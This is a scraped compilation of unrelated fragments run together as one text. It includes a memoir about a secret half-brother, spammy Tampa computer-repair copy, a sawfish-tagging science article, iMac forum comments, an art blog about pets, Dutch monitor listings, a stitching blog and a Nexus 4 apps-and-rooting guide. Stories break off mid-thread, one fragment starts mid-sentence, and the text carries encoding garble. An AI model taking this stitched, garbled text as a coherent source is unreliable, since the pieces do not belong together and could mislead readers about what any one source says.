When I read the card (I still have it), I literally went weak at the knees and had to sit down, but I knew at once that what it said was inescapably true. On 13th February, 1953; thirteen months before I was born in March 1954, and before my mum married my dad; my mum gave birth to a baby boy whom she called 'Julian Jerome Flynn' - (her maiden name was Flynn). She gave birth to Julian in St. Pelagia's Home for Penitent Girls (I kid you not) which was in Highgate, North London. It's since been demolished and is now a gated development.
All three of us were very close to our mum. We all loved her deeply. She was our rock, we knew she loved us unconditionally and she was always there for us. She was great fun to be with; we loved her company and spending time with her. Yet, none of us knew about this other brother. On that night I could only feel shock at the not knowing as we set off to the younger brother's house.
Source: Google (for both photos)
This is an article about St. Pelagia's from the Telegraph. http://www.telegraph.co.uk/news/uknews/10932969/Convent-that-forced-young-mothers-to-give-up-their-babies.html
It is certainly worth reading although I don't believe my mum was forced to give Julian up by the nuns, but it would have been extremely difficult to have kept him. One, it would have got back to her parents in Ireland and the shame of having an unmarried daughter with a child could have led to ostracism by their community. Secondly, in England there wasn't much in the way of good affordable childcare in the 1950s and mum would have to have worked to support herself and her child. There was a lot of stigma and shame attached to being an unmarried mother at that time.
When we got to the youngest brother's house I told him get himself a glass of wine and sit down as we had some news for him! We spent the rest of the night on the computer trying to find out more information. The one thing we did know was that our dad wasn't Julian's dad.
I rang Ireland and spoke to two of our surviving aunts - my mother's sister's - they were totally unaware of Julian. One of the aunt's told me they had only been made aware of my existence (and my mum's marriage) when my mum turned up in Ireland with me aged 11 months! I was left with my grandparent's and my aunt's, who were only young teenagers at the time, for about 3 months whilst she returned to England and work - of which more later.
Our searches on the computer kept taking us to an agent who represented Brian May (of Queen) and eventually brought us to a picture of someone called 'Julian Littman. This person looked exactly like one of our first cousins; the eldest son of my mum's older and closest sister, Aunty Betty. Unfortunately, this aunt had died in the late 1980s.
The card that had been left had telephone contact numbers on it and we agreed that in the morning I would call the numbers. I didn't sleep a wink that night and got up really early to search on my own computer for any information. This is what I found:
grabbed the title again at the competition in New York City this afternoon. He's the first texting competitor to win back-to-back titles.
Last year, finalist Rachel Taylor Blakely said she practiced by texting her friends AND texting the words from her schoolbooks.
|Welcome to Reality|
Last Saturday, 780 degrees and certificates were awarded to SCC students. Many of these students will go on to a four-year college or university to pursue a Bachelorâs degree. Others will pursue employment. No matter what your immediate goal is, â¦ Continue reading
|Home computer repair - Home computer repair Tampa troubleshooting||The basic parts of a Home computer repair are monitor, motherboard, SMPS, processor, daughter board, network cards, RAM, CMOS battery, hard disk, buses (cables), keyboard, mouse, UPS and modem. So these components will face damage as they are electronic components.|
Long beep sound heard while starting custom pc repair tampa and OS is not loading. Your RAM is damaged. So buy a RAM either D RAM or SD RAM after checking the slot in your motherboard and install new RAM.
Your Operating system OS may be damaged due to improper shutdown or due to missing of some files. Please re install your OS. Another problem can be your hard disk damage.
Huge sound coming from CPU. Your cabinet cooling fan may be making that huge noise while working. Try to replace that bad cooling fan with a good one.
Sometimes there will be problem in Home PC repair Tampa booting. So Home computer repair boot troubleshooting can be done by pressing delete button while restarting PC and providing appropriate settings in BIOS.
If you are like most people who often use computer repairs Tampa at work or in your home, then you must also know how frustrating it can be when your Home computer repair crashes in the middle of an important task. Home computer repair errors such as crashes and file corruption are often a result of registry problems. To make sure your PC always performs efficiently, you have to invest in registry repair software.
Do you use a free windows registry repair for your Laptop computer repair? There are a few guidelines that you need to keep in mind when purchasing software and these are:
It is important to note however, that software that can find many errors aren’t necessarily the best kind. Some dubious repair programs list errors where there aren’t actually any so choose well.
Unless you are a certified Home computer repair genius, it is best to choose user friendly software. Everyone needs free window registry repair programs.
Some Home computer repairs actually come with a built-in registry repair program and while you may be tempted to fix the registry yourself, remember that you might inadvertently delete information that is critical to Home computer repair operations.
About the author: Tampa pc pros inc takes pride in offering a wide range of computing solutions like: Pc Repair Tampa , Computer Repair Tampa , Custom Pc Repair Tampa , Computer Repair Service Tampa , Virus Removal Service Tampa.
computer security help: data backup
computer security help: data backup
Article Source: www.articlesnatch.com
|Chatbots, IoT and VR, Oh My: A Look Ahead at Tech in Real Estate||Technology in the real estate industry doesnât start and stop with the computer and smartphone. Regardless of your role in the real estate transaction, you can no longer afford to dismiss the impact of technology in the home buying process. Technology in real estate is designed to improve the end-to-end experience for home buyers and …Read more|
|Royal 3D Chess||Royal 3D Chess is a Free Board Strategy game. Play and learn with computer AI to become chess champion.nnIt is single player chess 3d game. Play and develop your own strategies and show your genius to win against AI.nnIt has extensively designed graphics; to make you feel like you are playing the real chess board […]|
|Tag! You're It|
Biologists catch and tag big sawfish in Florida waters
Food for Thought
Once a common top predator throughout coastal seas around the globe, sawfish have become remarkably rare. Indeed, today most populations are threatened with extinction. So spotting even one of these animals is reason to rejoice, notes Beau Yeiser of Mote Marine Laboratory in southern Florida. And this week, "we are nothing but giddy," he reports.
He and colleague Tonya Wiley just returned from a 2-day sawfish-scouting expedition during which they tagged a 7-foot male on Oct. 16. At that size, the strapping youth may be 5 to 7 years old, Yeiser says. He cautions, however, that estimating age is challenging "as we try and piece together the life history of this species. We don't even know its size at maturity yet."
These animalsâessentially flattened sharks with wingsâare members of the ray family. Only one species of this fish remains in U.S. waters, mostly off of Florida. Over the first half of the 20th century, this smalltooth sawfish (Pristis pectinata) was fished to the brink of extinctionâlargely by accident.
Although many cultures eat sawfishâthe animals' fins are especially prized in Asia as the featured ingredient in a pricey soupâmost of the animals in U.S. waters were landed and destroyed as bycatch, that is, nuisance species hauled in by commercial fishing fleets. The dire status of sawfish globally won these animals protection, last month, under a treaty banning international trade in endangered species (see Hammered Saws).
So far this year, Yeiser and Wiley have caught just 14 sawfish, most of them less than 4 feet long. Those would still be little kids, considering that these fish are almost a yard long at birth. Then again, the pair had expected only small ones because they've mainly been cruising coastal shallows this year in hopes of running into newborns and youngsters.
The scientists attach a numbered identification tag to the dorsal fin of every sawfish they catchâand then release the animal.
But last week's catch was so big that it qualified for a second identifier: a pop-up archival tag, or PAT. These recording devices are so heavy that they're reserved for large sawfishâat least 7-footers. To date, only some dozen of these animals have received PATs. Costing at least $4,000 each, these data-storage systems collect information every minute, for months, on the depth at which its host is swimming, the water temperature, and light levels. The latter information gets plugged into a computer program that roughly gauges the animal's geographic coordinates at any moment.
Researchers program a PAT to pop off the fish on a particular date. Once it floats to the surface, it sends its stored information in spurts, twice a day, to a satellite. That orbiting relay station then shoots those data back to Earth and the scientists' email addresses.
Last week's sawfish encounter took place in a southern Florida national wildlife refuge, in very shallow water. Investigated as a possible nursery, Yeiser says "I was expecting any sawfish that I might catch to be perhaps 4 to 5 feet in length." Instead, he found a much older juvenile. "But that's the beauty of this [sawfish] project; you never know what you are going to get when you're scouting a species that has not been studied much!"
Yeiser named the youth that he tagged last week Raloff. HmmmâI like the sound of that. Its tag is programmed to pop off on March 15. Stay tuned for an update on my namesake's travels.
If all goes well, that is.
A 7- and an 11-foot sawfish each received PATs in May. Although the satellite tags had been programmed to pop off 3 months later, they actually surfaced within just a couple weeks, Yeiser saysâand were never recovered.
So, each time biologists deploy the pricey devices, he says, "we just cross our fingers that they won't pop up earlyâor get lost in the middle of the Gulf."
Don't try this yourself
The sawfish is an endangered species, so federal law forbids its captureâexcept by researchers who have been granted a waiver. And even they need to release an animal after measuring and tagging it.
It's against the law to even harass the animals. Still, anglers may inadvertently snag one of the toothy marvels. When that happens, this species "should be released by keeping the fish in the water and cutting the line as close to the hook as possible," according to guidelines issued late last year by the National Marine Fisheries Service in St. Petersburg, Fla. "If it can be done safely, untangle the line if it is wrapped around the saw. Do not handle the animal or attempt to remove any hooks on the saw, except for with a long-handled dehooker," NOAA says.
Biologists request that any anglers who sight a sawfish report their encounter to the Mote lab. Its scientists are maintaining a database to help them identify important habitat for these endangered animals.
As interesting as these piscine oddities are, biologists would prefer that the public give the fish a wide berth. The primary reason: Approaching the animals can stress them, chase them from what should be waters safe from predators, or even interfere with their reproduction.
But there's another reason to steer clear, according to Captain Harvey Lee Hamilton, who charters a fishing boat out of Pineland, Fla. "I've caught plenty of sawfish in my life, and I'll tell you: They're dangerous. I'm still scared to death of them." Their sawsâwhich he terms bladesâare edged with dozens of razor-sharp "teeth." The muscular animals slash those saws from side to side to kill prey or defend themselves.
Says Hamilton: "Those fish get big, with blades that can go to at least 5 foot." And they slash those blades "so fast," he says, "that they could slice your feet off." Indeed, he told Science News Online: "I'd rather fight a shark than a sawfish."
If you would like to comment on this Food for Thought, please see the blog version.
Beau Yeiser and Tonya R. Wiley
Center for Shark Research
Mote Marine Laboratory
1600 Ken Thompson Parkway
Sarasota, FL 34236
Smalltooth Sawfish Coordinator
National Marine Fisheries Service
Southeast Regional Office, Protected Resources Division
263 13th Avenue South
St. Petersburg, FL 33071
2006. Mote scientists to help eBay identify species in new sawfish ban. Mote Marine Laboratory news release. Jan. 25. Available at [Go to].
Mote Marine Laboratory. How you can help save the U.S. smalltooth sawfish. Available at [Go to].
Raloff. J. 2007. Hammered saws. Science News 172(Aug. 11):90-92. Available at [Go to].
______. 2002. Clipping the fin trade. Science News 162(Oct. 12):232-234. Available at [Go to].
Sawfish in Peril: Sawfish Education Program. Available at [Go to].
|Computerized Plans||Our computerized blueprints are accurate and complete.Â Stretch your imagination with your own design or choose from one of our stock plans. We offer a variety of logs and methods of construction including Post & Beam, Butt & Pass, Dovetail, and Swedish Cope â This unique method of construction provides the ultimate in structural strength. [...]|
|Kommentar zu Docs & Demo von Anne Poe||I am still trying to correct the problem of downloading a gpx file using the download button on the maps generated by your GPX viewer plugin.
I have pasted the code you supplied into my hosting site (Bluehost) in the folder sequence of hidden files/ public-html/wp-content/uploads/.htaccess (which I created).
After refreshing and even rebooting, I still get the code text files when I click the download button associated with each map on my website page Exactly what am I supposed to get? I'm expecting to get a GPX file that I can save to my computer or upload into my Garmin.
Thanks again for helping.
|Photonic nanostructures by design||Wrinkle lithography and computer-based calculations are a winning combination for making quasi-random structured surfaces.|
|Comment #10||Each state has its own system but I know NY has a computer system called player tracking they know how much you spend ;what you played and how many others accross the state played the same also ....thats how they know if a number is sold -out ;|
777-1111-7777-222-333 and 1953 has been sold out for 4 years by 7pm
|RE: not exactly||I think that's kind of Apple's plan
"Look we sell really small, cool computers at a fairly reasonable price. But wait - we also sell iMacs which offer so much more in the way of features and at not that much more of a price! Aren't we amazing!"|
|RE: Apple just released their new budget PC||Well, considering those models are 5 years old, of course they (how the hell would they ship an iMac without a screen....was it a cube with a gaping hole in it???) are going to include CRTs and not LCDs. That'd be like saying the 386's from IBM back in 1992 were expensive because you can buy much faster computers from Apple in 2006.|
|RE: Apple just released their new budget PC||Its not a sweet spot in the US either... I worked at Dell a couple years ago trying to sell computers on the phone, $399 is the sweet spot for these chumps.
Anyway, $999 would easily get me a month of expenses (however, I live with 2 other people so my rent is cut pretty low), but I doubt it would last two.|
|RE: not a bad price, but....||We have a 20" iMac here. We like it for a few reasons:
- it sits tidily and attractively in our living room (no mess of wires and no ugly boxes)
- it does the business and is nearly silent
- I do not get tempted to take it apart
It will be here doing its job until the (John Lewis) warranty runs out in four (and a bit) years time.
Sooner or later computers need to become appliances!
Even geeks need to channel their efforts into enjoying their specialties.|
|RE: not a bad price, but....||One day, after a hot July, your drive will show signs of crashing. You will immediately try to do a backup using CCC. It will abort 90% of the way through. You will open the case, and discover a hard drive positioned in such a way that it is guaranteed to overheat.
Never mind, you have your backup. You'll try to start from it. Oops. Its USB. Can't boot from USB, only Firewire.
OK, you install a new drive, install the OS from scratch, now you try to get back your settings. Scattered in library files at random all over the place, and when you do copy them back, they don't work right.
Yes, sooner or later computers need to become appliances. But they have not in the iMacs. When they go wrong, and they will, you are royally screwed. Make a clone to a firewire drive, and make it now. Maybe your idea of an appliance. Not mine.Edited 2006-09-06 21:36|
|RE: not exactly||Yet still, the Mac Mini is not Core Duo 2... which remains a disappointment.
I think that for some more buck, one should get the new 17" iMac [the full featured version].
If you are looking for a $600 computer, just build yourself a PC. That makes more sense.|
Forty-one students participated in the 8-week summer research program, SCOPE, a student-faculty collaborative experience, conducting research in animal behavior, biology, chemistry/biochemistry, kinesiology, math/computer science, and physics.
|The Art of Lovin' Animals --- Featured Group of Artists Inspired by Their Beloved Pets.|
Painting and Photograph copyright by Luke and Ginger E. Van Hook, 2004
Courtesy of the Van Hook Collection
The Art of Lovin' Animals
Features a group of artists inspired,
motivated or influenced by their beloved pets
and appear in this blog in the following order:
Joshua Elias, Simone Gad, Betty Glass, David Newsom,
Monrovia Association of Fine Arts supporters
(KidsArt Studio, PaintNPlay Art Studios, Tyson & Tillman Skate Dogs)
Family Dog and Cat Hospital in Monrovia, California (displays animal artwork).
Ginger Van Hook, Luke Van Hook,
Alex in Welderland, Elena Wolek, and Zareh.
Additionally as part of the "Art of Lovin' Animals"
there is a special book and movie review of
John Grogan's book "Marley and Me", and the recent hit movie
starring Jennifer Aniston and Owen Wilson
Written by Enilde G. Van Hook with special thanks to all participating artists!
Do you remember your first pet? I do. I even have a picture of how much bigger my catsâ paws were than my two feet put together at the age of three. My mother, tells me I had a yellow duck, a small dog and a large yellow tabby cat that owned me as a child.
These three pets were protective, possessive and they were my first companions as I ventured out, for the first time, into my wild back yard of dirt and weeds. I was born in Rosario Argentina and to me now as an adult, my backyard is still my world. I live in Los Angeles, California but the romance of the Argentinean Pampas is not lost on me. From the pictures of my past, I gathered that my Belgian Grandfather, Francisco, ran a plant nursery in Buenos Aires and that my father, Luis, grew up to be an inventor in America. But the most unique connection I have to my past is my relationship with animals. Iâve had a pet at almost every age as I grew up. The importance of this type of companionship has not been explored enough in the art world, at least, this is my opinion. This is the reason I am blogging about the subject of the art and inspiration of lovinâ pets. I hope to instigate discussion, if not compassion. I hope to motivate an artistic response to my thoughts as well. You may have a completely different experience, so I personally encourage you to post your comments after you read this entry.
This is what I asked myself for the subject of the essay for Ginger's Art Journal. What is the relationship of animals and pets to the art world? How involved are animals throughout the art strata? How much inspiration is gathered from the love of a pet? Can that even be measured? Does the love of a pet inspire political causes? Activism? How does one explain the pangs of loneliness from the loss of a pet? Does the death of a pet make an artist create more art? Does the gift of a new life of a pet inspire hope and renewal in artists? How do artists express their love and affection for the four-legged critters of our earth? How do animals, pets, pet trees, pet rocks or pets of any kind affect the process of making art?
There are a number of artists that I have followed for a period of time to investigate the questions that will make up this entry. Studying the work of a number of local artists from the Los Angeles and surrounding areas that work with pets in their art practice, I will present some of their unique stories with photos. The artists, in alphabetical order, include Joshua Elias, Simone Gad, Betty Glass, David Newsom, Ginger Van Hook and Luke Van Hook, Alexandra from Alex in Welderland, Lena Wolek and Zareh. Additionally, the art of lovinâ animals has made a seamless transition from the literary art into the film arts so I will discuss one of my favorite books by John Grogan named âMarley and Meâ as it compares to its latest movie version of âMarley and Meâ starring Jennifer Aniston and Owen Wilson which opened in December for Christmas Day.
The method selected to choose these artists was random. I began my animal photographic study in 2006. Through my daily practice of studying the arts, I have come across people who were âin my back yardâ and came to connect with me in a special way. I didnât set out to write a story about animals. I merely went about my daily routine of photographing people and artwork that caught my âeyeâ because I was at the right place at the right time. Believing that the universe has a special plan for me, I allowed this story to evolve of its own volition. What I discovered both surprised me and opened me up. What I mean by this is that I was surprised to discover that artists who had pets had a great deal in common with other artists who had pets. Most people know and understand the history that reveals how the Egyptians revered cats and how the dog is considered âmanâs best friendâ. While it was common to have general conversations about how great it was to have pets and create pet portraits, I rarely came across artists that spoke to the deeper underlying significance in the arts about this specifically. While doing this research, I came across the most extreme case of worshiping our pets. The act of cloning has been in the news ever since the cloning of âDollyâ the sheep, but did you know that now there is a company that has launched itself into a commercial venture to clone manâs best friend? I discovered this and lots more so enjoy the new year in 2009 with a renewed commitment to your beloved pet. This is an ongoing story so donât feel left out if your best friend isnât included in this entry. Iâm still reviewing artwork and pet portraits,
feel free to send me an email about your animal story and Iâll include it in the followup stories!
Santa Monica, California
wait for Joshua Elias to become inspired to feed them.
Art in the making at the Brewery Artist Colony
Los Angeles, California, 2008
Studio visit by Ginger Van Hook
The instruments by which Joshua Elias creates the canvas of weather and inspiration.
Photo copyright Ginger Van Hook, 2008
DCA Fine Arts Gallery, Joshua Elias with Mathew Heller and his girlfriend
Santa Monica, California
in his studio at the Brewery Arts Complex in Los Angeles, California
Art has become about large quantities of Resin, masquerading as Content. The focus has been on Process, confusing it with Content. Enough. I wish to focus on Content. Story and Vibration lead the way for me to paint.
I work in oil because of the depth and movement that it allows for me, as a medium. I focus on Landscapes that are rearranged. Traveling spirits act as guides, to the movement of a particular painting. The influence of Moorish architecture and its many doorways offers and allows entryways into paintings.
At present we are in a period of Time where there seems to be long standing fights over Space, Time Religion, Money, Ideology, and Relationships. Enough. The one thing we do all share is Weather. Through the action of Creating our own environment, our own personal Weather, the Repositioning of Weather can illuminate and allow for more Creation to happen, more of a Life Force to shine and to take shape.
Ã¯Â¿_ Joshua Elias
Courtesy of the DCA website
Fine Arts Painter, Collage Artist, Actor and Performer
Simone Gad, Artist, Solo Show, L2Kontemporary Gallery
February 2008 Chinatown, Los Angeles, California,
Photograph by Ginger Van Hook, copyright 2008
Selfportrait with Max and Bella/Autoportrait avec Max et Bella
Private collection, photo courtesy of Simone Gad, Artist, copyright 2005
Gad/Rin-Tin-Tin Collection Long Beach Museum of Art
Courtesy Simone Gad, Artist, copyright 2005
Picture Holocaust Clowns - Pinups 127, Gad and Poodle
Courtesy Simone Gad, Artist, copyright 2005
Selfportrait with Cat and Jesus
Private collection, Courtesy of Simone Gad, Artist, copyright 2005
Hommage a Ma Mere 2005 Painting Collage
Copyright and Collection- Simone Gad
Courtesy Simone Gad-Artist
Photograph by Antonio Garcia
Autoportrait avec Kashmir, painting collage 2005/06
Courtesy Simone Gad- Artist and L2Kontemporary Gallery
Chinatown, Los Angeles, California. Copyright Simone Gad
Portrait of Bella, the Brindle cat, acting secretary for Artist, Simone Gad
Los Angeles, California, Artist studio visit
Photograph by Ginger Van Hook, copyright 2008
Bella the Brindle Cat, (on the Marilyn and JFK Installation)
Photo copyright and courtesy of
Portrait of Simone Gad, Artist with companion, Bella.
Los Angeles, California, Artist studio visit
Photograph by Ginger Van Hook, copyright 2008
Portrait of Bella
The Brindle cat, Artist assistant, model
and loyal companion to Simone Gad.
Los Angeles, California, Artist studio visit
Max and Bella pose for pictures in the window of Simone Gad's artist studio
Los Angeles, California
Photograph by Ginger Van Hook, copyright 2008
Simone Gad poses with one of her paintings of Chinatown
during her solo show at L2Kontemporary Gallery
Chinatown, Los Angeles, California
Photograph by Ginger Van Hook, copyright 2008
Enilde Van Hook writer's notes: I met Simone Gad at an exhibition of her work in Chinatown in the spring of 2008. The L2Kontemporary Gallery is a unique gallery located at 990 N. Hill Street #205 in Downtown Los Angeles (90012), California. I received an email from ArtScene, a wonderful source of local Art Events that is produced by the staff of Coagula Art Journal. Special thanks to Michael Salerno and Mat Gleason, because somewhere in the announcement, I read that Simone Gad was a Belgium-born artist and this led me to want to meet her to talk about the art in Belgium, where my grandfather had been born. Once I attended her exhibit and got a chance to meet Simone, I realized there was a distinct cultural connection we had through our reverence to the animals. She used images of her cats to make intriguing and poignant self-portraits and insightful photographic collages.
I have followed Simone Gadâs work into 2009 and you will enjoy visiting her site through the L2Kontemporary Gallery located in Chinatown in Los Angeles: Follow these links to get to know a renaissance artist, a versatile film and TV actress, a woman of many talents and an artist who has a great deal of compassion to show for her animal friends: visit the online gallery site at http://www.l2kontemporary.com to view her solo show at L2k for Feb 08 plus her updated resume which may be viewed at saatchigallery.org by writing in her name or wooloo.org by writing in Simone Gadâs name.
Special thanks to the L2Kontemporary Gallery for cooperating with my interview! (www.L2Kontemporary.com and L2Kontemporary@sbcglobal.net and phone: 323-225-1288)
Artist Statement and Biography: 2009
I've been showing in museums and galleries for 40 years-am a 6 times grants recipient, including a CRA Grant 1986, the Woman's Building 1985/6, New Orleans Contemporary Museum of Art 1984, the Gottlieb Foundation-NYC/Painting Medical Emergency Grant, Change Inc-Robert Rauschenberg Foundation Grant-both in 2002 for painting and medical emergency, and Artist Fellowship Foundation Grant in 2007-NYC. I am included in the Archives of the National Portrait Gallery/Smithsonian-Washington, DC, and will also be included in the Lyn Kienholz Encyclopedia of Los Angeles Artists who have shown between 1944 and 1979. In Los Angeles, I am represented by L2kontemporary Gallery-Chinatown, Jack Fischer Gallery in San Francisco, and am showing in Spain. I am also in the traveling museum exhibition-Your Documents Please thru 2010 in Japan/Europe/Mexico curated by Daniel Georges of Brooklyn, NY. I was born in Brussels, Belgium to holocaust survivor parents, from Poland. We came to the US in the early 1950's and settled in Boyle Heights/E.L.A, after arriving at Ellis Island. My mother got me into show-biz at the age of 4 upon our immigration. I grew up in the entertainment field as a young actress-have been working professionally in film, tv, commercials and theatre ever since. Have always had a dual career-.visual/performance artist and actor. George Herms and Wallace Berman were my first mentors. Al Hansen was my mentor from 1972 to 1995 when he passed away in Koln, Germany.
My cats Max and Bella Bettina Kashmir are my inspiration for many of my painting collages-have been so for many years. I've always been inspired by my cats and dogs that I've had since I arrived to this country from War torn Europe. My father got me my first dog-Teddy Queeny when I was a child living on Folsom Street-We had just returned from a movie on Brooklyn Avenue when we saw the puppies on our way home. I was allowed to have one-and I was so happy. But my mother hated animals and wouldn't let me keep my pet with me in my bedroom and it cried all night. I was heartbroken when I got home from Nursery School the following day and found that my dog was gone. My mom told me she had sent it to New Jersey to live with my Tante Sally. I wasn't allowed to have any animals after that. Years later I visited my aunt and asked her if she had taken care of my Teddy Queeny and she told me she never did-she never got the dog-didn't know what I was talking about. I realized that my mother had lied to me and had possibly killed my beloved doggie. I had moved to Topanga Canyon for a while in the late 1960's-that's where I got to know Wallace Berman and George Herms. I was given a miniature sheppard-who I named Lady. She was my constant companion and I adored her. She was run over by a couple of friends who were staying with me one night. I found her bleeding from her mouth by the driveway. She died in my arms and I could feel her spirit leave her body. We buried her the next morning. I was devastated for years. A friend of mine gave me a dash-hound and I took it home to be with me when I left Topanga and stayed with my parents for a while. I named her Wiggle Butts because she had this habit of wiggling her behind when she walked. I was not allowed to keep her-once again-so I called a friend and had her drive from The Canyon to pick Wiggles up and take care of her for me. When I left my parents and got an apartment, I got a cat-Nathaniel-my very first cat-who was with me for 15 years until he passed away. It was then that I started to incorporate animal objects into my collages-in the mid 1970's.
copyright Simone Gad 2009
http://www.l2kontemporary.com to view Simone Gadâs solo show at L2k for Feb 08 plus her updated resume-you may also get it on saatchigallery.org by writing in her name or wooloo.org by writing in Simone Gadâs name-
Focus One Gallery in Monrovia, California. Sponsored by M.A.F.A.,
the Monrovia Association of Fine Arts and Focus One Community Credit Union.
Photo by Ginger Van Hook, copyright 2006
Lulu, wearing her new holiday sweater,
pokes her nose into the gift bag
to see if she likes what Santa has brought her.
Photo copyright and courtesy of Betty Glass and James Glass.
Photo copyright and courtesy of Betty and James Glass.
Trojan Horses, Watercolor painting by Artist, Betty Glass
Photo copyright and courtesy of Betty and James Glass.
Hummy, Watercolor Painting by Artist, Betty Glass.
Photo copyright and courtesy of Betty and James Glass.
Yankee and Sugar, Watercolor Painting by Artist, Betty Glass
memorializing the life of her beloved friends.
Photo copyright and courtesy of Betty and James Glass.
Yankee (5-17-80 --- 4-20-94)
the larger white and orange Brittany on the right,
and Sugar (7-20-90 --- 12-24-04)
the smaller Brittany on the left.
"Beloved Friends and Forever in our hearts!"
Loyal Friends, Inspiration and Companions
to Artist, Betty Glass and her family.
(Special thanks to husband, James Glass
for his technical computer assistance
with digital photography formating of Betty Glass Artwork.)
Photo copyright and courtesy of Betty and James Glass
Enilde Van Hook, Writer's Notes: I met Betty Glass through the Monrovia Association of Fine arts in 2006. We were showing together at the Focus One Gallery on Huntington Drive in Monrovia, California. When Betty came into the gallery, she was toting her adorable poodle named Lulu. I was charmed immediately and I just had to have a photo of this beautiful female pooch with a twinkle in her eye and the gumption to come into an art gallery where only humans gathered. This little poodle had no clue there was any difference between her and her owner, and she acted like she was looking at the art just like everyone else. At the time, I considered this a very cultured poodle and I told Betty so. Betty giggled and let me take her snapshot with Lulu and then we did not see each other again until we had another show together, also at Focus One Gallery two years later in December of 2008. When I saw Betty this time, I saw the connection of her artwork and the love of her animals come through her work and later, she agreed to participate in the interview for my blog. You may enjoy Betty Glass's artwork by visiting her website at www.bhglassart.com
Betty H. Glass
Artist Statement about Animal Art
Through art we communicate our feelings and thoughts.
Our art reflects what experiences in life have influenced us.
I have had a lifetime of pets
ranging from goldfish, parakeets, and turtles and, of course,
the loyal dogâalways your friend even when the sky seems to be falling.
I am still sketching and painting animals, birds, and fish.
The softness of their fur, the texture of their feathers and fins,
the variations of color are very appealing to me,
because color is part of my artistic signature.
Sometimes they are presented in a realistic fashion.
Other times I use animals in a more stylized wayâ
using their shapes as patterns, semi-abstracting them and their background.
For example, my painting Trojan Horses shows flattened stylized figures of horses.
Hopefully artistically pleasing and calling to mind ancient Greece.
|iiyama G-MASTER G2730HSU-B1 27" Full HD TN Mat Zwart computer monitor LED display|
|Acer SA270BID 27" Full HD IPS Zwart computer monitor|
|Acer KG241Q 23.6" Full HD TN+Film Zwart computer monitor|
|Samsung S27H650FDU 27" Full HD TFT/PLS Zwart computer monitor|
|LG 22BK55WY-B 22" IPS Mat Zwart computer monitor|
|DELL UltraSharp U3417W 34.14" UltraWide Quad HD IPS Zwart computer monitor LED display|
As Homer Simpson once said: "Did you know they have the internet on computers these days?"
|NEC MultiSync E245WMi 24" PLS Zwart computer monitor|
|iiyama G-MASTER GB2488HSU-B3 24" Full HD TN Mat Zwart computer monitor|
|LG 27UD58 27" 4K Ultra HD IPS Zwart computer monitor|
|Philips Brilliance 4K Ultra HD LCD-scherm met MultiView BDM4037UW/00 computer monitor|
|ASUS PG279Q 27" Wide Quad HD IPS Mat Zwart computer monitor|
|All Moved In...Almost|
I haven't had much time for stitching these past few months. Paperwork, packing, moving, unpacking, and cleaning has taken up most of my free time. Despite the fact that we officially moved in at the end of March, we're still transporting stuff over from our parent's homes. Our spare bedroom has become a storage area for the yet-to-be-unpacked boxes.
My favorite room in the house is my computer/craft room. I have my own computer desk, a craft desk, and a large closet full of crafting supplies in organized storage bins. It couldn't be any more perfect!
This is the birth announcement for my boyfriend's cousin's baby after another six hours of stitching (sixteen hours total). All that's left to do is the rest of the moon, the placement of the text, and the beaded stars. The text, of course, will have to wait until after little Braiden is born, which won't be long now. Within the next week or two, I think. I need to hurry and get the rest of the moon done!
|Benq EW3270ZL 32" Quad HD AMVA+ (SNB) Zwart computer monitor|
|DELL S Series S2216H 21.5" Full HD TFT Mat Zwart computer monitor|
|DELL P1917S 19" HD IPS Wit computer monitor|
|Benq BL912 19" Zwart computer monitor|
|Corsair SP120 Computer case Fan|
|Corsair HD120 Computer case Fan|
Note 1: So you got a Nexus 4. Congratulations. You have an incredibly powerful device in your hands. This post is not N4 specific, so you can try several of these with any top-of-the-line Android device. N4 because all of these have been field-tested on mine. If you've got interesting apps/uses to share, shoot in the comments, I'd love to hear 'em. Otherwise, if 'Angry Birds' is all you've done, read on, you must. ;)
Note 2: I'm sure someone at Google is huge Guillermo Del Toro fan. Galaxy Nexus was code-named 'toro', Nexus 4 is code-named 'mako' (ref: Pacific Rim).
Part I: use mako
Part II: root mako
Part III: sudo mako
Part I: use mako
a) Lock screen
DashClock widget, which is beautiful, and isn't heavy on the battery. There are several extensions for this widget available in the store, so suit yourself.
b) Home screen
Ice Galaxy Live Wallpaper. This fellow, Maxelus, makes beautiful wallpapers. Most of the widgets are created using Zooper Widgets, and the icon pack is Minimalist.
Nova Launcher is a popular choice for launcher replacement. It gives you a lot of options to customize just about everything. A shoutout to Buzz Launcher, which attempts to create a marketplace for out-of-the-box homescreens, which you can download and apply in a flash! Worth checking out if you are among the lazy ones.
Head here for some inspiration.
...and since you will install so many apps, it is easy to get lost. Enter: App Dialer, yep, an app to find apps installed on your phone!
Chrome to Phone - Send links from Chrome browser on desktop to your android phone.
Phone To Desktop - Send links from your android phone to Chrome browser on desktop.
Desktop Notifications - Get notifications from your phone on Chrome browser on desktop as desktop notifications.
AirDroid - Transfer files to/from phone to desktop over wi-fi. Send SMS, use phone camera as a webcam, manage contacts, apps, music et al, from your desktop.
TeamViewer - Remote control/remote desktop your computer from your phone over a data connection.
GOM Remote - Control GOM Player on your computer through a remote-like interface on your phone.
Unified Remote - Use your phone as a keyboard/mouse for your computer.
d) Travel apps
FlightTrack - Beautiful interface which shows flight path on a map. Gives schedule and gate information. Excellent, excellent app.
Currency - Offline currency conversion.
Google Maps / Google Translate - Their 'offline' mode is sweet! Download maps, and language packs for offline use! Very, very handy if you are planning a foreign holiday soon!
Triposo - Travel guide.
e) Special mention
SMS Backup+ (backs up SMS, call logs, and now WhatsApp messages to Gmail!),
Clean Master (clear system cache),
Battery Doctor (battery optimisation),
CamScanner (excellent app to get scanner level quality for documents through the phone camera),
TrueCaller (it's creepy how they get the unknown numbers right, but they do),
Light Manager (customise phone's LED notifications),
SphereShare (photosphere images sharing community),
TV Show Favs (track TV show episodes), and
Default App Manager (manage default apps for any phone action).
Part II: root mako
Rooting gives you the ability to flash custom ROMs on your phone. I haven't flashed any custom ROMs yet, I am pretty happy with the stock ROM. But rooting allows you to make full backups of your phone, and some pretty nifty apps. Most of the methods of rooting Nexus 4 factory resets the phone, and guides are easily available if you google it.
The method I used doesn't factory reset the phone. (Motochopper method)
1: Get motochopper and the drivers from here.
2: Root. Yep, that simple. A full guide here (they even have a video!). The guide is for Galaxy S4, but it works just the same for Nexus 4 (I've done it!).
All the other methods unlocks bootloader first, and then applies root. Hence the factory reset.
Motochopper roots without unlocking the bootloader. Once you have achieved root, you can unlock your bootloader using BootUnlocker (yep, there's an app for that!). Android 4.3 update was announced today, so there's a decent chance you'll lose root after the update. You can use Voodoo OTA RootKeeper to preserve root during the OTA update.
Part III: sudo mako
Well... you have a rooted phone. What now?
